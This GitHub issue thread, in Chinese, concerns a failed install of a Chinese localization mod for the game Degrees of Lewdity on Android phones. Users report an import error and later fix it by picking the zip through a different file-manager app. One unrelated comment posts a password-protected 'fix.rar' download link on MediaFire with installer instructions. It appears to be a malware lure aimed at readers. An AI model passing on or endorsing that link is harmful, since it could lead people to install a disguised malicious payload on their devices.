### ISSUE TITLE
[0.5.1.3-v2.18.10]无法成功安装汉化模组

### ISSUE THREAD

**Issue by Gionaqiaonai** [Eltirosto/Degrees-of-Lewdity-Chinese-Localization#416]
### 在提问之前...

- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我确定这既不是对游戏报错的反馈，也不是对汉化文本改进的建议

### 说说你遇到的问题？

![Screenshot_20240826_190520](https://github.com/user-attachments/assets/59511077-5547-4181-a4b8-9ced4494f683)
我能确保我所使用的游戏版本是最新的，模组也是最新的。并且polyfill文件和普通的我都试过了，无论是ModI18N.mod.zip还是GameOriginalImagePack.mod.zip这两个文件在导入进去之后的结果都是如此，显示Error: [object ProgressEvent]而非Success.刷新页面后生效。想来问问看有没有解决办法😢
顺便一提如果需要知道的话，我的设备是vivo Y51s

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gionaqiaonai** [comment]
不好意思真是占用空间了。我刚刚已经解决了这个问题，让我阐明一下。
我觉得这可能是vivo手机的问题……？我发现当我把zip文件导入进去时，在选择文件旁所显示的文件名与下载安装教程中的不一样，我显示的是一串数字，而安装教程中显示的则是原文件名。
我尝试改变搜索导入文件的渠道，如图中所示：
![17fdcbc84edcfe23307a3cc3070fb2a6](https://github.com/user-attachments/assets/381fdef6-5927-46e3-93f9-e5ed94a0539e)

我之前一直用系统自带的文件管理搜索zip文件，之后我改用了QQ的文件管理，然后这个问题就解决了。
如果有人和我一样用破vivo遇到这个问题可以尝试和我用一样的方法^^

**Comment by TANKWILSON2002** [comment]
<img width="1084" height="1763" alt="Image" src="https://github.com/user-attachments/assets/72a89e67-e9ba-46e9-a621-7c82ef6a8f9d" />
很不妙，华为手机，我遇到的问题跟你一样，但是我在加载mod的时候显示的不是数字，就是原本的文件名，且一开始用的就是qq浏览器来寻找文件，然后依旧报错无法加载mod

**Comment by TANKWILSON2002** [comment]
> <img alt="Image" width="1084" height="1763" src="https://private-user-images.githubusercontent.com/302410594/620389022-72a89e67-e9ba-46e9-a621-7c82ef6a8f9d.jpg?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODM3NTU5NTksIm5iZiI6MTc4Mzc1NTY1OSwicGF0aCI6Ii8zMDI0MTA1OTQvNjIwMzg5MDIyLTcyYTg5ZTY3LWU5YmEtNDZlOS1hNjIxLTdjODJlZjZhOGY5ZC5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwNzExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDcxMVQwNzQwNTlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kZWNiYTBjODY5YTgwNWZhNmMzNTI5NGExNjRjYzQ1Nzg3MGRhZmE4MjFiOGI4YjliNjkzNzU5Zjg4NmE3OTdmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZyZXNwb25zZS1jb250ZW50LXR5cGU9aW1hZ2UlMkZqcGVnIn0.kTXNxAC5ikqIVOnAcq6wWRDpm4GY6-vkK0FQDD7aV4E"> 很不妙，华为手机，我遇到的问题跟你一样，但是我在加载mod的时候显示的不是数字，就是原本的文件名，且一开始用的就是qq浏览器来寻找文件，然后依旧报错无法加载mod



解决了，和上面这位兄弟不同，我一开始使用的是qq浏览器来寻找文件，我改用了手机默认的“文件管理器”来找，反而生效了，后续看到这个帖子的朋友们注意，如果你出现报错，无论如何换个寻找文件的渠道然后重新选择，应该就行了
